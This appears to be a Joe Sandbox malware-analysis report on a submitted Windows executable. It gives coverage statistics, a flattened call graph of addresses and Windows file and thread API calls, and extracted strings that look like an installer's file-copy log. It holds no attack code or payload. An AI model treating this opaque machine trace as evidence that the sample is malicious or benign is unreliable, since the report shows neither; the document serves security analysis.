                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastSleep
                                                              • String ID:
                                                              • API String ID: 1458359878-0
                                                              • Opcode ID: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                              • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                              • Opcode Fuzzy Hash: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                              • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

                                                              Execution Graph

                                                              Execution Coverage:15.6%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:4.6%
                                                              Total number of Nodes:2000
                                                              Total number of Limit Nodes:87
VariantClear 56544->56726 56727 406c34 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56545->56727 56554 491d1d 56548->56554 56555 491d42 56548->56555 56729 407280 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetCurrentDirectoryA 56549->56729 56550 491cd5 56728 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56550->56728 56553 491cfd 56730 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56553->56730 56557 446ff8 18 API calls 56554->56557 56560 491d7a 56555->56560 56561 491d51 56555->56561 56558 491d2a 56557->56558 56559 4072a8 SetCurrentDirectoryA 56558->56559 56562 491d32 56559->56562 56567 491d89 56560->56567 56568 491db2 56560->56568 56563 446ff8 18 API calls 56561->56563 56731 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56562->56731 56564 491d5e 56563->56564 56566 42c804 5 API calls 56564->56566 56569 491d69 56566->56569 56570 446ff8 18 API calls 56567->56570 56573 491dfe 56568->56573 56574 491dc1 56568->56574 56732 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56569->56732 56572 491d96 56570->56572 56733 4071f8 8 API calls 56572->56733 56581 491e0d 56573->56581 56582 491e36 56573->56582 56576 446ff8 18 API calls 56574->56576 56578 491dd0 56576->56578 56577 491da1 56734 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56577->56734 56580 446ff8 18 API calls 56578->56580 56583 491de1 56580->56583 56584 446ff8 18 API calls 56581->56584 56589 491e6e 56582->56589 56590 491e45 56582->56590 56735 4918fc 8 API calls 56583->56735 56585 491e1a 56584->56585 56587 42c8a4 5 API calls 56585->56587 56591 491e25 56587->56591 56588 491ded 56736 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56588->56736 56596 491e7d 56589->56596 56597 491ea6 56589->56597 56593 446ff8 18 API calls 56590->56593 56737 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56591->56737 56595 491e52 56593->56595 56598 42c8cc 5 API calls 56595->56598 56599 446ff8 18 
API calls 56596->56599 56604 491ede 56597->56604 56605 491eb5 56597->56605 56600 491e5d 56598->56600 56601 491e8a 56599->56601 56738 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56600->56738 56739 42c8fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 56601->56739 56610 491eed 56604->56610 56611 491f16 56604->56611 56607 446ff8 18 API calls 56605->56607 56606 491e95 56740 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56606->56740 56609 491ec2 56607->56609 56612 42c92c 5 API calls 56609->56612 56614 446ff8 18 API calls 56610->56614 56617 491f62 56611->56617 56618 491f25 56611->56618 56613 491ecd 56612->56613 56741 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56613->56741 56616 491efa 56614->56616 56619 42c954 5 API calls 56616->56619 56625 491f71 56617->56625 56626 491fb4 56617->56626 56620 446ff8 18 API calls 56618->56620 56621 491f05 56619->56621 56622 491f34 56620->56622 56742 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56621->56742 56624 446ff8 18 API calls 56622->56624 56627 491f45 56624->56627 56628 446ff8 18 API calls 56625->56628 56632 491fc3 56626->56632 56633 492027 56626->56633 56743 42c4f8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 56627->56743 56630 491f84 56628->56630 56634 446ff8 18 API calls 56630->56634 56631 491f51 56744 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56631->56744 56637 446ff8 18 API calls 56632->56637 56641 492066 56633->56641 56642 492036 56633->56642 56635 491f95 56634->56635 56745 491af4 12 API calls 56635->56745 56639 491fd0 56637->56639 56708 42c608 7 API calls 56639->56708 56640 491fa3 56746 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56640->56746 56650 4920a5 56641->56650 56651 492075 56641->56651 56645 446ff8 18 API calls 56642->56645 56647 492043 56645->56647 56646 491fde 56648 491fe2 56646->56648 56649 492017 56646->56649 56749 452908 
Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection DeleteFileA GetLastError 56647->56749 56654 446ff8 18 API calls 56648->56654 56748 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56649->56748 56665 4920e4 56650->56665 56666 4920b4 56650->56666 56655 446ff8 18 API calls 56651->56655 56658 491ff1 56654->56658 56660 492082 56655->56660 56656 491c39 56656->56527 56657 492050 56750 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56657->56750 56709 452c80 56658->56709 56664 452770 5 API calls 56660->56664 56662 492061 56662->56656 56663 492001 56747 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56663->56747 56668 49208f 56664->56668 56673 49212c 56665->56673 56674 4920f3 56665->56674 56669 446ff8 18 API calls 56666->56669 56751 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56668->56751 56670 4920c1 56669->56670 56752 452e10 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 56670->56752 56679 49213b 56673->56679 56680 492174 56673->56680 56676 446ff8 18 API calls 56674->56676 56675 4920ce 56753 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56675->56753 56678 492102 56676->56678 56681 446ff8 18 API calls 56678->56681 56682 446ff8 18 API calls 56679->56682 56685 492187 56680->56685 56692 49223d 56680->56692 56683 492113 56681->56683 56684 49214a 56682->56684 56689 447278 5 API calls 56683->56689 56686 446ff8 18 API calls 56684->56686 56687 446ff8 18 API calls 56685->56687 56688 49215b 56686->56688 56690 4921b4 56687->56690 56695 447278 5 API calls 56688->56695 56689->56656 56691 446ff8 18 API calls 56690->56691 56693 4921cb 56691->56693 56692->56656 56757 446f9c 18 API calls 56692->56757 56754 407ddc 7 API calls 56693->56754 56695->56656 56696 492256 56697 42e8c8 5 API calls 56696->56697 56698 49225e 56697->56698 56758 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 
56698->56758 56701 4921ed 56702 446ff8 18 API calls 56701->56702 56703 492201 56702->56703 56755 408508 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56703->56755 56705 49220c 56756 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56705->56756 56707 492218 56708->56646 56710 452724 2 API calls 56709->56710 56712 452c99 56710->56712 56711 452c9d 56711->56663 56712->56711 56713 452cc1 MoveFileA GetLastError 56712->56713 56714 452760 Wow64RevertWow64FsRedirection 56713->56714 56715 452ce7 56714->56715 56715->56663 56716->56656 56718 406bbf 56717->56718 56719 406be1 56718->56719 56720 406bd8 56718->56720 56723 403778 4 API calls 56719->56723 56721 403400 4 API calls 56720->56721 56722 406bdf 56721->56722 56724 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56722->56724 56723->56722 56724->56656 56725->56544 56726->56656 56727->56550 56728->56656 56729->56553 56730->56656 56731->56656 56732->56656 56733->56577 56734->56656 56735->56588 56736->56656 56737->56656 56738->56656 56739->56606 56740->56656 56741->56656 56742->56656 56743->56631 56744->56656 56745->56640 56746->56656 56747->56656 56748->56656 56749->56657 56750->56662 56751->56656 56752->56675 56753->56656 56754->56701 56755->56705 56756->56707 56757->56696 56758->56656 56759 40cc34 56762 406f10 WriteFile 56759->56762 56763 406f2d 56762->56763 50833 48095d 50838 451004 50833->50838 50835 480971 50848 47fa0c 50835->50848 50837 480995 50839 451011 50838->50839 50841 451065 50839->50841 50857 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50839->50857 50854 450e88 50841->50854 50845 45108d 50846 4510d0 50845->50846 50859 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50845->50859 50846->50835 50864 40b3c8 50848->50864 50850 47fa79 50850->50837 50853 47fa2e 50853->50850 50868 4069dc 50853->50868 50871 476994 50853->50871 50860 450e34 50854->50860 50857->50841 50858 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50858->50845 50859->50846 50861 450e57 
50860->50861 50862 450e46 50860->50862 50861->50845 50861->50858 50863 450e4b InterlockedExchange 50862->50863 50863->50861 50865 40b3d3 50864->50865 50866 40b3f3 50865->50866 50887 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50865->50887 50866->50853 50869 402648 4 API calls 50868->50869 50870 4069e7 50869->50870 50870->50853 50880 4769c5 50871->50880 50884 476a0e 50871->50884 50872 476a59 50888 451294 50872->50888 50873 451294 21 API calls 50873->50880 50875 451294 21 API calls 50875->50884 50876 476a70 50878 403420 4 API calls 50876->50878 50881 476a8a 50878->50881 50879 4038a4 4 API calls 50879->50884 50880->50873 50880->50884 50894 4038a4 50880->50894 50903 403744 50880->50903 50907 403450 50880->50907 50881->50853 50884->50872 50884->50875 50884->50879 50885 403450 4 API calls 50884->50885 50886 403744 4 API calls 50884->50886 50885->50884 50886->50884 50887->50866 50889 4512af 50888->50889 50893 4512a4 50888->50893 50913 451238 21 API calls 50889->50913 50891 4512ba 50891->50893 50914 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50891->50914 50893->50876 50895 4038b1 50894->50895 50902 4038e1 50894->50902 50897 4038da 50895->50897 50899 4038bd 50895->50899 50896 403400 4 API calls 50898 4038cb 50896->50898 50900 4034bc 4 API calls 50897->50900 50898->50880 50915 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50899->50915 50900->50902 50902->50896 50904 40374a 50903->50904 50906 40375b 50903->50906 50905 4034bc 4 API calls 50904->50905 50904->50906 50905->50906 50906->50880 50908 403454 50907->50908 50911 403464 50907->50911 50910 4034bc 4 API calls 50908->50910 50908->50911 50909 403490 50909->50880 50910->50911 50911->50909 50912 402660 4 API calls 50911->50912 50912->50909 50913->50891 50914->50893 50915->50898 50916 41ee54 50917 41ee63 IsWindowVisible 50916->50917 50918 41ee99 50916->50918 50917->50918 50919 41ee6d IsWindowEnabled 50917->50919 50919->50918 50920 41ee77 50919->50920 50921 402648 4 API calls 50920->50921 50922 
41ee81 EnableWindow 50921->50922 50922->50918 50923 46bb10 50924 46bfad 50923->50924 50925 46bb44 50923->50925 50926 403400 4 API calls 50924->50926 50927 46bb80 50925->50927 50930 46bbdc 50925->50930 50931 46bbba 50925->50931 50932 46bbcb 50925->50932 50933 46bb98 50925->50933 50934 46bba9 50925->50934 50929 46bfec 50926->50929 50927->50924 51014 468c74 50927->51014 50936 403400 4 API calls 50929->50936 51246 46baa0 45 API calls 50930->51246 50979 46b6d0 50931->50979 51245 46b890 67 API calls 50932->51245 51243 46b420 47 API calls 50933->51243 51244 46b588 42 API calls 50934->51244 50942 46bff4 50936->50942 50941 46bb9e 50941->50924 50941->50927 50943 46bc18 50943->50924 50957 46bc5b 50943->50957 51247 494da0 50943->51247 50946 46bd7e 51266 48358c 123 API calls 50946->51266 50949 46bd99 50949->50924 50950 42cbc0 6 API calls 50950->50957 50951 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50951->50957 50952 46af68 23 API calls 50952->50957 50955 414ae8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50955->50957 50956 46af68 23 API calls 50956->50924 50957->50924 50957->50946 50957->50950 50957->50951 50957->50952 50957->50955 50958 46bdd7 50957->50958 50975 46be9f 50957->50975 51017 468bb0 50957->51017 51025 46acd4 50957->51025 51170 483084 50957->51170 51283 46b1dc 19 API calls 50957->51283 51032 469f1c 50958->51032 50960 46be3d 50961 403450 4 API calls 50960->50961 50962 46be4d 50961->50962 50963 46bea9 50962->50963 50964 46be59 50962->50964 50969 46bf6b 50963->50969 51093 46af68 50963->51093 51267 457f1c 50964->51267 50968 457f1c 24 API calls 50968->50975 50975->50956 51284 46c424 50979->51284 50982 46b852 50983 403420 4 API calls 50982->50983 50985 46b86c 50983->50985 50987 403400 4 API calls 50985->50987 50986 46b71e 50988 46b83e 50986->50988 51291 455f84 13 API calls 50986->51291 50990 46b874 50987->50990 50988->50982 50989 403450 4 API calls 50988->50989 50989->50982 50992 403400 4 API calls 50990->50992 50993 46b87c 50992->50993 50993->50927 50995 
46b801 50995->50982 50995->50988 51000 42cd48 7 API calls 50995->51000 50996 46b73c 50998 46b7a1 50996->50998 51292 466600 50996->51292 50998->50982 50998->50995 51301 42cd48 50998->51301 51003 46b817 51000->51003 51003->50988 51008 451458 4 API calls 51003->51008 51004 466600 19 API calls 51010 46b82e 51008->51010 51308 47efd0 42 API calls 51010->51308 51015 468bb0 19 API calls 51014->51015 51016 468c83 51015->51016 51016->50943 51020 468bdf 51017->51020 51018 4078f4 19 API calls 51019 468c18 51018->51019 51562 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51019->51562 51020->51018 51022 468c20 51020->51022 51023 403400 4 API calls 51022->51023 51024 468c38 51023->51024 51024->50957 51026 46ace5 51025->51026 51027 46ace0 51025->51027 51648 469a80 46 API calls 51026->51648 51028 46ace3 51027->51028 51563 46a740 51027->51563 51028->50957 51030 46aced 51030->50957 51033 403400 4 API calls 51032->51033 51034 469f4a 51033->51034 52025 47dd00 51034->52025 51036 469fad 51037 469fb1 51036->51037 51038 469fca 51036->51038 52032 466800 51037->52032 51041 469fbb 51038->51041 52035 494c90 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51038->52035 51040 46a25e 51045 403420 4 API calls 51040->51045 51041->51040 51043 46a154 51041->51043 51044 46a0e9 51041->51044 51048 403494 4 API calls 51043->51048 51047 403494 4 API calls 51044->51047 51049 46a288 51045->51049 51046 469fe6 51046->51041 51050 469fee 51046->51050 51051 46a0f6 51047->51051 51052 46a161 51048->51052 51049->50960 51053 46af68 23 API calls 51050->51053 51054 40357c 4 API calls 51051->51054 51055 40357c 4 API calls 51052->51055 51060 469ffb 51053->51060 51056 46a103 51054->51056 51057 46a16e 51055->51057 51058 40357c 4 API calls 51056->51058 51059 40357c 4 API calls 51057->51059 51061 46a110 51058->51061 51062 46a17b 51059->51062 51065 46a024 SetActiveWindow 51060->51065 51066 46a03c 51060->51066 51063 40357c 4 API calls 51061->51063 51064 40357c 4 API calls 51062->51064 51067 46a11d 51063->51067 51068 
46a188 51064->51068 51065->51066 52036 42f560 51066->52036 51069 466800 20 API calls 51067->51069 51070 40357c 4 API calls 51068->51070 51071 46a12b 51069->51071 51072 46a196 51070->51072 51074 40357c 4 API calls 51071->51074 51075 414b18 4 API calls 51072->51075 51077 46a134 51074->51077 51078 46a152 51075->51078 51081 40357c 4 API calls 51077->51081 52053 466b38 51078->52053 51082 46a141 51081->51082 51084 414b18 4 API calls 51082->51084 51083 46a08d 51085 46ade4 21 API calls 51083->51085 51084->51078 51086 46a0bf 51085->51086 51086->50960 51094 468c74 19 API calls 51093->51094 51095 46af80 51094->51095 51096 46afa2 51095->51096 51097 4652cc 7 API calls 51095->51097 52249 4652cc 51096->52249 51097->51096 51101 46afba 51102 46ade4 21 API calls 51101->51102 51103 46aff2 51102->51103 51104 414b18 4 API calls 51103->51104 51105 46b006 51104->51105 51106 46b012 51105->51106 51107 46b03c 51105->51107 51108 414b18 4 API calls 51106->51108 51110 46b05b 51107->51110 51111 46b085 51107->51111 51109 46b026 51108->51109 51113 414b18 4 API calls 51109->51113 51114 414b18 4 API calls 51110->51114 51112 414b18 4 API calls 51111->51112 51116 46b099 51112->51116 51115 46b06f 51114->51115 51171 46c424 48 API calls 51170->51171 51172 4830c7 51171->51172 51173 4830d0 51172->51173 52536 408be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 51172->52536 51175 414ae8 4 API calls 51173->51175 51176 4830e0 51175->51176 51177 403450 4 API calls 51176->51177 51178 4830ed 51177->51178 52338 46c77c 51178->52338 51181 4830fd 51182 414ae8 4 API calls 51181->51182 51184 48310d 51182->51184 51185 403450 4 API calls 51184->51185 51186 48311a 51185->51186 51187 469868 SendMessageA 51186->51187 51188 483133 51187->51188 51189 483184 51188->51189 52538 479e18 23 API calls 51188->52538 52367 4241dc IsIconic 51189->52367 51193 48319f SetActiveWindow 51194 4831b4 51193->51194 52375 4824b4 51194->52375 51243->50941 51244->50927 51245->50927 51246->50927 54199 43d9c8 51247->54199 51250 494dcc 
54204 431bd0 51250->54204 51251 494e52 51252 494e61 51251->51252 54237 4945c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51251->54237 51252->50957 51261 494e16 54235 49465c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51261->54235 51263 494e2a 54236 433dd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51263->54236 51265 494e4a 51265->50957 51266->50949 51268 457f41 51267->51268 51269 4078f4 19 API calls 51268->51269 51270 457f61 51268->51270 51271 457f59 51269->51271 51272 403400 4 API calls 51270->51272 51273 457d10 24 API calls 51271->51273 51274 457f76 51272->51274 51273->51270 51274->50968 51283->50957 51309 46c4bc 51284->51309 51287 414ae8 51288 414af6 51287->51288 51289 4034e0 4 API calls 51288->51289 51290 414b03 51289->51290 51290->50986 51291->50996 51294 46661a 51292->51294 51513 4078f4 51294->51513 51556 42cccc 51301->51556 51304 451458 51305 451428 4 API calls 51304->51305 51306 451474 51305->51306 51308->50988 51310 414ae8 4 API calls 51309->51310 51311 46c4f0 51310->51311 51370 466898 51311->51370 51315 46c502 51316 46c511 51315->51316 51317 46c52a 51315->51317 51440 47efd0 42 API calls 51316->51440 51320 46c571 51317->51320 51322 46c558 51317->51322 51319 403420 4 API calls 51321 46b702 51319->51321 51323 46c5d6 51320->51323 51337 46c575 51320->51337 51321->50982 51321->51287 51441 47efd0 42 API calls 51322->51441 51443 42cb4c CharNextA 51323->51443 51326 46c525 51326->51319 51327 46c5e5 51328 46c5e9 51327->51328 51333 46c602 51327->51333 51444 47efd0 42 API calls 51328->51444 51330 46c5bd 51442 47efd0 42 API calls 51330->51442 51332 46c626 51445 47efd0 42 API calls 51332->51445 51333->51332 51384 466a08 51333->51384 51336 46c616 51336->51332 51389 466a38 51336->51389 51337->51330 51337->51333 51340 46c63f 51393 403778 51340->51393 51345 46c666 51446 466a94 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51345->51446 51346 46c697 51404 42c8cc 51346->51404 51350 46c679 51351 451458 4 API calls 51350->51351 51353 46c686 51351->51353 51447 47efd0 
42 API calls 51353->51447 51375 4668b2 51370->51375 51372 42cbc0 6 API calls 51372->51375 51373 403450 4 API calls 51373->51375 51374 406bb0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51374->51375 51375->51372 51375->51373 51375->51374 51376 4668fb 51375->51376 51450 42caac 51375->51450 51377 403420 4 API calls 51376->51377 51378 466915 51377->51378 51379 414b18 51378->51379 51380 414ae8 4 API calls 51379->51380 51381 414b3c 51380->51381 51382 403400 4 API calls 51381->51382 51383 414b6d 51382->51383 51383->51315 51387 466a12 51384->51387 51385 466a33 51385->51336 51386 466a25 51386->51336 51387->51385 51387->51386 51466 42cb3c CharNextA 51387->51466 51391 466a42 51389->51391 51390 466a6f 51390->51332 51390->51340 51391->51390 51467 42cb3c CharNextA 51391->51467 51394 4037aa 51393->51394 51395 40377d 51393->51395 51396 403400 4 API calls 51394->51396 51395->51394 51398 403791 51395->51398 51397 4037a0 51396->51397 51400 42c99c 51397->51400 51399 4034e0 4 API calls 51398->51399 51399->51397 51401 42c9f5 51400->51401 51402 42c9b2 51400->51402 51401->51345 51401->51346 51402->51401 51468 42cb3c CharNextA 51402->51468 51469 42c674 51404->51469 51440->51326 51441->51326 51442->51326 51443->51327 51444->51326 51445->51326 51446->51350 51447->51326 51451 403494 4 API calls 51450->51451 51454 42cabc 51451->51454 51452 403744 4 API calls 51452->51454 51454->51452 51457 42caf2 51454->51457 51459 42c444 IsDBCSLeadByte 51454->51459 51455 42cb36 51455->51375 51457->51455 51460 4037b8 51457->51460 51465 42c444 IsDBCSLeadByte 51457->51465 51459->51454 51461 403744 4 API calls 51460->51461 51463 4037c6 51461->51463 51462 4037fc 51462->51457 51463->51462 51464 4038a4 4 API calls 51463->51464 51464->51462 51465->51457 51466->51387 51467->51391 51468->51402 51472 42c67c 51469->51472 51475 42c68d 51472->51475 51473 42c6f1 51475->51473 51478 42c6ab 51475->51478 51516 407908 51513->51516 51517 407925 51516->51517 51524 4075b8 51517->51524 51520 407951 51522 4034e0 4 API calls 
51520->51522 51523 407903 51522->51523 51523->51004 51527 4075d3 51524->51527 51525 4075e5 51525->51520 51529 4069a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 51525->51529 51527->51525 51530 4076da 19 API calls 51527->51530 51531 4075ac LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51527->51531 51529->51520 51530->51527 51531->51527 51557 42cbc0 6 API calls 51556->51557 51558 42ccee 51557->51558 51559 42ccf6 GetFileAttributesA 51558->51559 51560 403400 4 API calls 51559->51560 51561 42cd13 51560->51561 51561->50995 51561->51304 51562->51022 51565 46a787 51563->51565 51564 46abff 51567 46ac1a 51564->51567 51568 46ac4b 51564->51568 51565->51564 51566 46a842 51565->51566 51570 403494 4 API calls 51565->51570 51569 46a863 51566->51569 51573 46a8a4 51566->51573 51571 403494 4 API calls 51567->51571 51572 403494 4 API calls 51568->51572 51574 403494 4 API calls 51569->51574 51575 46a7c6 51570->51575 51576 46ac28 51571->51576 51577 46ac59 51572->51577 51581 403400 4 API calls 51573->51581 51578 46a871 51574->51578 51579 414ae8 4 API calls 51575->51579 51675 46915c 12 API calls 51576->51675 51676 46915c 12 API calls 51577->51676 51583 414ae8 4 API calls 51578->51583 51584 46a7e7 51579->51584 51585 46a8a2 51581->51585 51587 46a892 51583->51587 51649 403634 51584->51649 51634 46a988 51585->51634 51655 469868 51585->51655 51586 46ac36 51589 403400 4 API calls 51586->51589 51592 403634 4 API calls 51587->51592 51590 46ac7c 51589->51590 51595 403400 4 API calls 51590->51595 51591 46aa10 51597 403400 4 API calls 51591->51597 51592->51585 51601 46ac84 51595->51601 51603 46aa0e 51597->51603 51598 46a8c4 51599 46a902 51598->51599 51600 46a8ca 51598->51600 51606 403400 4 API calls 51599->51606 51604 403494 4 API calls 51600->51604 51605 403420 4 API calls 51601->51605 51670 469ca4 43 API calls 51603->51670 51607 46a8d8 51604->51607 51608 46ac91 51605->51608 51610 46a900 51606->51610 51661 47c26c 51607->51661 51608->51028 51609 46a9cf 51614 403494 4 API calls 
51609->51614 51664 469b5c 51610->51664 51618 46a9dd 51614->51618 51616 46aa39 51625 46aa44 51616->51625 51626 46aa9a 51616->51626 51617 46a8f0 51620 403634 4 API calls 51617->51620 51621 414ae8 4 API calls 51618->51621 51620->51610 51623 46a9fe 51621->51623 51627 403634 4 API calls 51623->51627 51624 46a929 51630 46a934 51624->51630 51631 46a98a 51624->51631 51629 403494 4 API calls 51625->51629 51628 403400 4 API calls 51626->51628 51627->51603 51635 46aaa2 51628->51635 51637 46aa52 51629->51637 51632 403494 4 API calls 51630->51632 51633 403400 4 API calls 51631->51633 51639 46a942 51632->51639 51633->51634 51634->51591 51634->51609 51647 46ab4b 51635->51647 51671 494c90 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51635->51671 51637->51635 51641 403634 4 API calls 51637->51641 51642 46aa98 51637->51642 51638 46aac5 51638->51647 51672 494f3c 18 API calls 51638->51672 51639->51634 51643 403634 4 API calls 51639->51643 51641->51637 51642->51635 51643->51639 51645 46abec 51674 429144 SendMessageA SendMessageA 51645->51674 51673 4290f4 SendMessageA 51647->51673 51648->51030 51650 40363c 51649->51650 51651 4034bc 4 API calls 51650->51651 51652 40364f 51651->51652 51653 403450 4 API calls 51652->51653 51654 403677 51653->51654 51677 42a040 SendMessageA 51655->51677 51657 469877 51658 469897 51657->51658 51678 42a040 SendMessageA 51657->51678 51658->51598 51660 469887 51660->51598 51679 47c2b4 51661->51679 51668 469b89 51664->51668 51665 469beb 51666 403400 4 API calls 51665->51666 51667 469c00 51666->51667 51667->51624 51668->51665 52024 469ae0 43 API calls 51668->52024 51670->51616 51671->51638 51672->51647 51673->51645 51674->51564 51675->51586 51676->51586 51677->51657 51678->51660 51680 403494 4 API calls 51679->51680 51687 47c2e7 51680->51687 51681 47c3f9 51682 403420 4 API calls 51681->51682 51683 47c289 51682->51683 51683->51617 51685 403778 4 API calls 51685->51687 51687->51681 51687->51685 51690 4037b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 
51687->51690 51691 47b100 51687->51691 51935 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51687->51935 51936 403800 51687->51936 51940 42c97c CharPrevA 51687->51940 51690->51687 51692 47b152 51691->51692 51695 47b130 51691->51695 51693 47b172 51692->51693 51694 47b160 51692->51694 51698 47b1d5 51693->51698 51699 47b180 51693->51699 51696 403494 4 API calls 51694->51696 51695->51692 51945 47a030 19 API calls 51695->51945 51929 47b16d 51696->51929 51709 47b1f6 51698->51709 51710 47b1e3 51698->51710 51701 47b1af 51699->51701 51702 47b189 51699->51702 51700 403400 4 API calls 51704 47baf8 51700->51704 51703 47b1c2 51701->51703 51947 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51701->51947 51705 47b19c 51702->51705 51946 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51702->51946 51707 403494 4 API calls 51703->51707 51708 403400 4 API calls 51704->51708 51712 403494 4 API calls 51705->51712 51707->51929 51713 47bb00 51708->51713 51715 47b217 51709->51715 51716 47b204 51709->51716 51714 403494 4 API calls 51710->51714 51712->51929 51713->51687 51714->51929 51718 47b267 51715->51718 51719 47b225 51715->51719 51717 403494 4 API calls 51716->51717 51717->51929 51724 47b275 51718->51724 51725 47b288 51718->51725 51720 47b241 51719->51720 51721 47b22e 51719->51721 51723 47b254 51720->51723 51948 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51720->51948 51722 403494 4 API calls 51721->51722 51722->51929 51727 403494 4 API calls 51723->51727 51728 403494 4 API calls 51724->51728 51729 47b296 51725->51729 51730 47b2a9 51725->51730 51727->51929 51728->51929 51731 403494 4 API calls 51729->51731 51732 47b2b7 51730->51732 51733 47b2ca 51730->51733 51731->51929 51734 403494 4 API calls 51732->51734 51735 47b2eb 51733->51735 51736 47b2d8 51733->51736 51734->51929 51738 47b327 51735->51738 51739 47b2f9 51735->51739 51737 403494 4 API calls 51736->51737 51737->51929 51744 47b335 51738->51744 51745 47b364 51738->51745 51740 47b315 51739->51740 51741 
                                                              Strings
                                                              • Will register the file (a type library) later., xrefs: 00471513
                                                              • Version of our file: (none), xrefs: 00470AFC
                                                              • Time stamp of existing file: %s, xrefs: 00470A2B
                                                              • Dest filename: %s, xrefs: 00470894
                                                              • Failed to strip read-only attribute., xrefs: 00470ED3
                                                              • Will register the file (a DLL/OCX) later., xrefs: 0047151F
                                                              • Time stamp of existing file: (failed to read), xrefs: 00470A37
                                                              • Existing file is protected by Windows File Protection. Skipping., xrefs: 00470DEC
                                                              • .tmp, xrefs: 00470FB7
                                                              • Incrementing shared file count (32-bit)., xrefs: 004715A5
                                                              • Existing file has a later time stamp. Skipping., xrefs: 00470DCF
                                                              • Time stamp of our file: (failed to read), xrefs: 004709A7
                                                              • Non-default bitness: 32-bit, xrefs: 004708BB
                                                              • Same version. Skipping., xrefs: 00470CE5
                                                              • , xrefs: 00470BCF, 00470DA0, 00470E1E
                                                              • Version of existing file: %u.%u.%u.%u, xrefs: 00470B7C
                                                              • Uninstaller requires administrator: %s, xrefs: 0047118F
                                                              • Dest file exists., xrefs: 004709BB
                                                              • InUn, xrefs: 0047115F
                                                              • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470CD0
                                                              • Non-default bitness: 64-bit, xrefs: 004708AF
                                                              • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470CC4
                                                              • Same time stamp. Skipping., xrefs: 00470D55
                                                              • Skipping due to "onlyifdoesntexist" flag., xrefs: 004709CE
                                                              • @, xrefs: 004707B0
                                                              • Stripped read-only attribute., xrefs: 00470EC7
                                                              • Existing file is a newer version. Skipping., xrefs: 00470C02
                                                              • Installing into GAC, xrefs: 00471714
                                                              • User opted not to overwrite the existing file. Skipping., xrefs: 00470E4D
                                                              • -- File entry --, xrefs: 004706FB
                                                              • Dest file is protected by Windows File Protection., xrefs: 004708ED
                                                              • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470CB5
                                                              • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 00470E96
                                                              • Incrementing shared file count (64-bit)., xrefs: 0047158C
                                                              • Version of our file: %u.%u.%u.%u, xrefs: 00470AF0
                                                              • Version of existing file: (none), xrefs: 00470CFA
